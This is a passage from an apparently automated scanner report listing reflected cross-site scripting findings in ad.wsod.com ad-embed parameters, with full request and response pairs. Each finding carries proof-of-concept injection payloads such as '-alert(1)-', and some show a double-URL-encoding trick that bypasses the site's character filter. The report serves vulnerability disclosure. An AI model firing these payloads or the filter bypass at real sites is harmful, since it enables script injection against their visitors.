P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

4.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

4.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {

...[SNIP]...

4.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

4.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 851

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

4.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [&PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683569**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683597**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf">
...[SNIP]...

4.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296683606**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

4.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in the REST URL parameter 2. This input was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135781851";alert(1)//aa8ae4a84fa/353.0.js.120x30/1296683666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f
...[SNIP]...

4.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in the REST URL parameter 3. This input was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8";alert(1)//7ebd7131956/1296683672**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9
...[SNIP]...

4.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

